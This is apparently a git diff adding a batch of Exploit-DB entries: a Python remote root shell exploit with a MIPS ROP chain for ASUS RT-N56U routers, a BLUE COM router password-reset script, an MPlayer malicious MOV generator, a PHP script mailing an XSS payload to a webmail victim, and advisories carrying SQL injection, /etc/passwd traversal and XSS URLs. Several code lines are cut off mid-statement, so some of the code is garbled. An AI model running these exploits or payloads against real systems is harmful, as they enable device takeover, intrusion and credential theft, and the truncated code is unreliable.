+ URL = raw_input("\n[*] Please enter the URL of the router. Ex. http://192.168.1.1\n>")
+ if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://":
+ return URL.lower()
+ else:
+ print "\n\n [!!!] Target URL cant be null and must contain http:// or https:// [!!!]\n"
+ sleep(1)
+
+
+def creds():
+
+ while True:
+
+ User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
+ Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
+ if len(User) != 0:
+ return User, Pass
+ else:
+ print "\n [!!!] Username cant be null [!!!]\n"
+ sleep(1)
+
+
+def basicAuth():
+
+ auth = None
+
+ while auth != "yes" and auth != "no":
+ auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")
+
+ if auth.lower() == "yes":
+ print "\n\n[!!!] You chose to use HTTP Basic Authentication [!!!]\n"
+ sleep(1)
+ User, Pass = creds()
+ return base64.encodestring("%s:%s" % (User, Pass)).replace("\n", "")
+ elif auth.lower() == "no":
+ print "\n\n[!!!] You chose not to use HTTP Basic Authentication. [!!!]\n"
+ sleep(1)
+ return 0
+ else:
+ print "\n\n[!!!] Error: You entered %s. Please enter \"yes\" or \"no\"! [!!!]\n" % auth
+ sleep(1)
+
+
+def sigHandle(signum, frm): # Signal handler
+
+ print "\n\n[!!!] Cleaning up the exploit... [!!!]\n"
+ sleep(1)
+ exit(0)
+
+
+def main():
+
+ print """\n[*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
+[*] Discovered and Reported: October 2013
+[*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
+[*] Contact: Twitter - @rootHak42
+[*] Software Vendor: http://asus.com
+[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
+[*] Software: httpd (Listens on TCP/80 and TCP/443)
+[*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
+[*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343\n"""
+ signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
+
+ target = targURL()
+ try:
+ print "\n [*] Creating network socket"
+ netSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ if target[0:5] == "https":
+ host = target[8:]
+ port = 443
+ print " [*] Preparing SSL/TLS support."
+ https_netSock = ssl.wrap_socket(netSock)
+ finger = fingerPrint(host, port, https_netSock)
+ else:
+ host = target[7:]
+ port = 80
+ finger = fingerPrint(host, port, netSock)
+ except Exception as error:
+ print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
+ exit(0)
+
+ auth = basicAuth()
+ junk = "\x42" * 109
+ link_nop = "2Aa3"
+
+ #Base address of ld_uClibc and libc in httpd address space
+ ld_uClibcBase = 0x2aaa8000
+ libcBaseAddr = 0x2ab5f000
+
+ #Rop Chain
+ #: move v0,s0 -> sched_yield()
+ #: lw ra,28(sp) -> Rop2
+ #: lw s0,24(sp)
+ #: jr ra
+ #: addiu sp,sp,32
+ saved_ra1 = struct.pack(": lw ra,36(sp) -> Rop 3
+ #<_dl_runtime_pltresolve+72>: lw a0,16(sp)
+ #<_dl_runtime_pltresolve+76>: lw a1,20(sp)
+ #<_dl_runtime_pltresolve+80>: lw a2,24(sp)
+ #<_dl_runtime_pltresolve+84>: lw a3,28(sp)
+ #<_dl_runtime_pltresolve+88>: addiu sp,sp,40
+ #<_dl_runtime_pltresolve+92>: move t9,v0
+ #<_dl_runtime_pltresolve+96>: jr t9 -> jump sched_yield()
+ #<_dl_runtime_pltresolve+100>: nop
+ saved_ra2 = struct.pack(": addiu a1,sp,24 -> ptr to stack
+ #: lw gp,16(sp)
+ #: lw ra,32(sp) -> Rop 4
+ #: jr ra -> jump Rop 4
+ #: addiu sp,sp,40
+ saved_ra3 = struct.pack(" ptr to jalr sp on stack
+ #addiu a0,a0,56
+ #jr t9 -> jump to stack
+ #move a1,a2
+ saved_ra4 = struct.pack("
%3E&hidessid=off&security=wpawpa2&authmethodselect=psk&wpapp=---&pmkcaching=off&confirm=Confirm HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Proxy-Connection: keep-alive
+Referer: http://192.168.1.1/webconfig/wlan/country.html
+Cookie: httpTimeOut=None
+Authorization: Basic VGhpc2lzbm90Ok15b3JnaW5hbHBhc3N3b3Jk
+
+Attack details
+The variable Network Name (SSID): has been set to ">
\ No newline at end of file
diff --git a/platforms/hardware/webapps/31088.py b/platforms/hardware/webapps/31088.py
new file mode 100755
index 000000000..341361e5a
--- /dev/null
+++ b/platforms/hardware/webapps/31088.py
@@ -0,0 +1,59 @@
+# Exploit Title: BLUE COM Router - 5360/52018 Password Reset Exploit
+# Date: 20/1/2013
+# Exploit Author: KAI (kaisai12)
+# Home: CEH.VN
+# Version: BCOM - 5360
+
+# vulnerability - change password easy ! no protect !
+#var loc = 'password.cgi?';
+#switch ( idx ) {
+# case 2:
+# loc += 'sptPassword=' + encodeUrl(pwdNew.value);
+# break;
+# case 3:
+# loc += 'usrPassword=' + encodeUrl(pwdNew.value);
+# break;
+# default:
+# loc += 'sysPassword=' + encodeUrl(pwdNew.value);
+# break;
+# }
+#
+# var code = 'location="' + loc + '"';
+# eval(code);
+# }
+#}
+
+
+import urllib
+import sys
+
+def attackrouter(ip,password):
+ try:
+ params = urllib.urlencode({'sysPassword': str(password)})
+ f = urllib.urlopen("http://"+ip+"/password.cgi?%s" % params)
+ print "[+] IP: %s - Reset password: %s" % (ip,password)
+ return
+ except:
+ print "[-] error"
+
+
+def main():
+ if len(sys.argv) > 2:
+ ip = sys.argv[1]
+ password = sys.argv[2]
+ print "--------------------------------------------------"
+ print "Router BCOM Exploit Execute Reset password modem "
+ print " author: KAI(CEH>VN) "
+ print "--------------------------------------------------"
+ print "[+] Sending exploit: OK"
+ attackrouter(ip,password)
+ else:
+ print "[-] Command error"
+ print "[-] Use:bluecomRT.py "
+
+if __name__ == '__main__':
+ main()
+
+
+
+
diff --git a/platforms/linux/dos/30894.txt b/platforms/linux/dos/30894.txt
new file mode 100755
index 000000000..30c22da8f
--- /dev/null
+++ b/platforms/linux/dos/30894.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26899/info
+
+PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
+
+Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
+
+These issues affect PeerCast 0.12.17, SVN 334 and prior versions.
+
+http://www.exploit-db.com/sploits/30894.zip
\ No newline at end of file
diff --git a/platforms/linux/dos/31018.txt b/platforms/linux/dos/31018.txt
new file mode 100755
index 000000000..32a57c67c
--- /dev/null
+++ b/platforms/linux/dos/31018.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27249/info
+
+GStreamer is prone to multiple unspecified denial-of-service vulnerabilities when handling malformed media files.
+
+Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
+
+These issues affect GStreamer 0.10.15; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/31018-1.mpg
+http://www.exploit-db.com/sploits/31018-2.mpg
+http://www.exploit-db.com/sploits/31018-3.m2v
+http://www.exploit-db.com/sploits/31018-4.m2v
\ No newline at end of file
diff --git a/platforms/linux/remote/30907.txt b/platforms/linux/remote/30907.txt
new file mode 100755
index 000000000..47395886c
--- /dev/null
+++ b/platforms/linux/remote/30907.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26960/info
+
+The Adobe Flash Player ActiveX control is prone to a cross-domain scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary JavaScript in the context of another domain.
+
+This issue affects Adobe Flash Player 9.0.48.0, 8.0.35.0, and prior versions.
+
+NOTE: This issue was previously disclosed in BID 26929 (Adobe Flash Player Multiple Security Vulnerabilities) but has been assigned its own BID because new technical details are available.
+
+http://www.exploit-db.com/sploits/30907.as
\ No newline at end of file
diff --git a/platforms/linux/remote/30971.txt b/platforms/linux/remote/30971.txt
new file mode 100755
index 000000000..c7c3fe26a
--- /dev/null
+++ b/platforms/linux/remote/30971.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27103/info
+
+Georgia SoftWorks Secure Shell Server is prone to multiple remote code-execution vulnerabilities:
+
+- A format-string vulnerability
+- Two buffer-overflow vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.
+
+Georgia SoftWorks Secure Shell Server 7.01.0003 is vulnerable to these issues; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30971.zip
\ No newline at end of file
diff --git a/platforms/linux/remote/31076.py b/platforms/linux/remote/31076.py
new file mode 100755
index 000000000..0a2127f96
--- /dev/null
+++ b/platforms/linux/remote/31076.py
@@ -0,0 +1,59 @@
+source: http://www.securityfocus.com/bid/27499/info
+
+MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory.
+
+An attacker can exploit this issue to execute arbitrary code, which can result in the complete compromise of the computer. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue affects MPlayer 1.0rc2; other versions may also be affected.
+
+#!/bin/python
+
+import struct
+import sys
+
+def mkatom(type,data):
+ if len(type) != 4:
+ raise "type must by of length 4!!!"
+ mov = ""
+ mov += struct.pack(">L",len(data)+8)
+ mov += type
+ mov += data
+ return mov
+
+def poc(address, block_size):
+
+ what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk
+ base= ((address - 8) / block_size) +1
+
+ ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1")
+ mdat = mkatom("mdat","MALDAAAAAD!")
+ stsc = mkatom("stsc",struct.pack(">L",1) + \
+ struct.pack(">L",2) + \
+ struct.pack(">L",base) + \
+ what + \
+ struct.pack(">L",base+300)+what)
+ trak = mkatom("trak",stsc)
+ moov = mkatom("moov",trak)
+
+ file = ftyp + mdat + moov
+ return file
+
+try:
+ if sys.argv[2] != "linux":
+ evilness = poc(0x0122e000, 24) #Windows XP SP2 Prof. ES
+ else:
+ evilness = poc(0x088aa020, 20) #Linux Gentoo
+
+ print "[+] Generating file: %s" % sys.argv[1]
+ file = open(sys.argv[1], "wb")
+ file.write(evilness)
+ file.close()
+ print "[+] Done."
+
+except Exception, e:
+ print "[+] Usage: python mplayer_poc.py filename.mov windows (For
+WinXP Prof SP2 ES)"
+ print " python mplayer_poc.py filename.mov linux (For
+Linux Gentoo)"
+
+
diff --git a/platforms/multiple/dos/30943.txt b/platforms/multiple/dos/30943.txt
new file mode 100755
index 000000000..47f7db193
--- /dev/null
+++ b/platforms/multiple/dos/30943.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27048/info
+
+Libnemesi is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions.
+
+Libnemesi 0.6.4-rc1 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30943.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30989.txt b/platforms/multiple/dos/30989.txt
new file mode 100755
index 000000000..cae760495
--- /dev/null
+++ b/platforms/multiple/dos/30989.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27141/info
+
+Pragma Systems FortressSSH is prone to a remote denial-of-service vulnerability because it fails to adequately handle certain exceptions when processing overly long user-supplied input.
+
+Attackers can exploit this issue to exhaust the maximum number of connections alotted for servers. Successful attacks will deny access to legitimate users.
+
+FortressSSH 5.0 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30989.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30990.txt b/platforms/multiple/dos/30990.txt
new file mode 100755
index 000000000..03ded2c7e
--- /dev/null
+++ b/platforms/multiple/dos/30990.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27142/info
+
+Foxit WAC Server is prone to a denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects Foxit WAC Server 2.0 Build 3503 and prior versions.
+
+http://www.exploit-db.com/sploits/30990-1.zip
+http://www.exploit-db.com/sploits/30990-2.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30991.txt b/platforms/multiple/dos/30991.txt
new file mode 100755
index 000000000..0d0c4b776
--- /dev/null
+++ b/platforms/multiple/dos/30991.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27143/info
+
+Pragma TelnetServer is prone to a denial-of-service vulnerability because it fails to adequately handle certain telnet options.
+
+Attackers can leverage this issue to terminate the server and cause denial-of-service conditions.
+
+This issue affects Pragma TelnetServer 7.0 Build 4 Revision 589; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/30991.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/31100.txt b/platforms/multiple/dos/31100.txt
new file mode 100755
index 000000000..bdfb42dd4
--- /dev/null
+++ b/platforms/multiple/dos/31100.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27593/info
+
+Anon Proxy Server is prone to a remote buffer-overflow vulnerability because the application fails to sufficiently bounds-check user-supplied input.
+
+Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application, facilitating the compromise of affected computers.
+
+Versions prior to Anon Proxy Server 0.103 are vulnerable to this issue.
+
+print "A" x 430 . '"' x 29 . "A" x 40 . "\n"
\ No newline at end of file
diff --git a/platforms/multiple/local/30970.txt b/platforms/multiple/local/30970.txt
new file mode 100755
index 000000000..453d24768
--- /dev/null
+++ b/platforms/multiple/local/30970.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27102/info
+
+White_Dune is affected by a format-string vulnerability and a buffer-overflow vulnerability.
+
+Exploiting these issues can allow local attackers to execute arbitrary code in the context of the application.
+
+Versions prior to White_Dune 0.29beta795 are affected.
+
+http://www.exploit-db.com/sploits/30970.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/30944.txt b/platforms/multiple/remote/30944.txt
new file mode 100755
index 000000000..9bf8055e3
--- /dev/null
+++ b/platforms/multiple/remote/30944.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27049/info
+
+Feng is prone to multiple remote buffer-overflow and denial-of-service vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the server application. Attackers may also crash the application, denying service to legitimate users.
+
+Feng 0.1.15 is vulnerable to these issues; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30944.zip
\ No newline at end of file
diff --git a/platforms/novell/remote/31095.txt b/platforms/novell/remote/31095.txt
new file mode 100755
index 000000000..fe2750471
--- /dev/null
+++ b/platforms/novell/remote/31095.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27582/info
+
+Novell GroupWise WebAccess is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+Novell GroupWise WebAccess 7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/servlet/webacc?Error=[XSS]
+http://www.example.com/servlet/webacc?User.html=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30877.txt b/platforms/php/webapps/30877.txt
new file mode 100755
index 000000000..b92023bb9
--- /dev/null
+++ b/platforms/php/webapps/30877.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26800/info
+
+Roundcube Webmail is prone to an input-validation vulnerability because it fails to sanitize HTML email messages.
+
+Attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user. Successful attacks can allow attackers to steal cookie-based authentication credentials from legitimate users of the site; other attacks are also possible.
+
+Roundcube Webmail 0.1rc2 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30877.eml
\ No newline at end of file
diff --git a/platforms/php/webapps/31074.txt b/platforms/php/webapps/31074.txt
new file mode 100755
index 000000000..a0db41d6a
--- /dev/null
+++ b/platforms/php/webapps/31074.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27492/info
+
+Nucleus CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects Nucleus CMS 3.31; other versions may also be vulnerable.
+
+http://www.example.com/[installdir]/action.php/">
\ No newline at end of file
diff --git a/platforms/php/webapps/31075.txt b/platforms/php/webapps/31075.txt
new file mode 100755
index 000000000..0df2d14f8
--- /dev/null
+++ b/platforms/php/webapps/31075.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27498/info
+
+AmpJuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+AmpJuke 0.7.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/scriptpath/index.php?what=search&start=0&dir=ASC&sorttbl=track&order_by=track.name&limit=[Xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/31077.txt b/platforms/php/webapps/31077.txt
new file mode 100755
index 000000000..6bf75bffc
--- /dev/null
+++ b/platforms/php/webapps/31077.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27508/info
+
+The 'com_buslicense' component for Mambo/Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_buslicense§ionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31079.txt b/platforms/php/webapps/31079.txt
new file mode 100755
index 000000000..d3652d99e
--- /dev/null
+++ b/platforms/php/webapps/31079.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27517/info
+
+webSPELL is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+webSPELL 4.01.02 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/index.php?site=whoisonline&sort=">[xss code]
\ No newline at end of file
diff --git a/platforms/php/webapps/31080.txt b/platforms/php/webapps/31080.txt
new file mode 100755
index 000000000..dbf735d38
--- /dev/null
+++ b/platforms/php/webapps/31080.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27518/info
+
+YeSiL KoRiDoR Ziyaretçi Defteri is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/defter/index.php?sayfa=[sqL inj. code here ..]
\ No newline at end of file
diff --git a/platforms/php/webapps/31082.txt b/platforms/php/webapps/31082.txt
new file mode 100755
index 000000000..8ff446df3
--- /dev/null
+++ b/platforms/php/webapps/31082.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27547/info
+
+Liferay Enterprise Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Liferay Enterprise Portal 4.3.6.
+
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</script>
diff --git a/platforms/php/webapps/31083.txt b/platforms/php/webapps/31083.txt
new file mode 100755
index 000000000..f1b6d405b
--- /dev/null
+++ b/platforms/php/webapps/31083.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27559/info
+
+Nilson's Blogger is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to include local files in the context of the webserver process. This may allow the attacker to obtain potentially sensitive information; other attacks are also possible.
+
+This issue affects Nilson's Blogger 0.11; other versions may also be vulnerable.
+
+http://www.example.com/comments.php?thispost=../../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/31084.txt b/platforms/php/webapps/31084.txt
new file mode 100755
index 000000000..62b2d79d9
--- /dev/null
+++ b/platforms/php/webapps/31084.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27563/info
+
+Archimede Net 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/telefonia/E-Guest_show.php?display=(sql)
\ No newline at end of file
diff --git a/platforms/php/webapps/31085.txt b/platforms/php/webapps/31085.txt
new file mode 100755
index 000000000..ff3a4e1ca
--- /dev/null
+++ b/platforms/php/webapps/31085.txt
@@ -0,0 +1,26 @@
+# Exploit Title : Doodle4Gift <= Multiple Vulnerabilities
+# Author : Dr.NaNo
+# Date : H-1435/3/18 - 2014/1/19
+# Software Link : http://www.hotscripts.com/listing/doodle4gift/
+# Software Link2: https://sites.google.com/site/doodle4gift/
+#
+#
+# (1) Cross Site Scripting (XSS):
+#
+#
+# http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
+#
+# http://localhost/{path}/index.php?action=showprofile&profile=
+#
+#
+#
+# (2) information disclosure:
+#
+#
+# http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
+#
+#
+#
+# A special gift for: (P0c Team),(V4-Team):?????? ????? ??
+#
+#
diff --git a/platforms/php/webapps/31086.php b/platforms/php/webapps/31086.php
new file mode 100755
index 000000000..92a050cd3
--- /dev/null
+++ b/platforms/php/webapps/31086.php
@@ -0,0 +1,86 @@
+Click Me, Please...\r\n
+
+ NOTE: javascript html char encode = javaScRipt
+
+ then you will be able to get into the victim's mailbox via the url:
+ http://[WebSite]/[AfterLogic]/Default.aspx
+
+## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory:
+ http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list
+
+
+*/
+
+echo "AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit";
+require_once('class.phpmailer.php');
+
+$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
+$mail->IsSMTP(); // telling the class to use SMTP
+
+
+/* SETTINGS */
+$smtp_user = "username"; // Any valid smtp account
+$smtp_pass = "password"; // Your PASSWORD
+$smtp_port = "25"; // SMTP PORT Default: 25
+$smtp_host = "localhost"; // Any valid smtp server
+$from = "attacker@email.com"; // Any email
+$victim = "victim@email.com"; // Victim email on afterlogic webmail.
+$subject = "Salam"; // Subject
+
+/* Body Text */
+$body = 'Click Me, Please...\r\n';
+
+
+
+try {
+ $mail->SMTPDebug = 2; // enables SMTP debug information (for testing)
+ $mail->SMTPAuth = false; // enable SMTP authentication
+ $mail->Host = $smtp_host;
+ $mail->Port = $smtp_port;
+ $mail->Username = $smtp_user; // SMTP account username
+ $mail->Password = $smtp_pass; // SMTP account password
+
+ $mail->SetFrom($from, 'Attacker');
+ $mail->AddReplyTo($from, 'Attacker');
+
+ $mail->AddAddress($victim, 'Victim');
+ $mail->Subject = $subject;
+
+ $mail->MsgHTML($body);
+ $mail->Send();
+ echo "Message Sent OK\n";
+} catch (phpmailerException $e) {
+ echo $e->errorMessage();
+} catch (Exception $e) {
+ echo $e->getMessage();
+}
+?>
+
+
+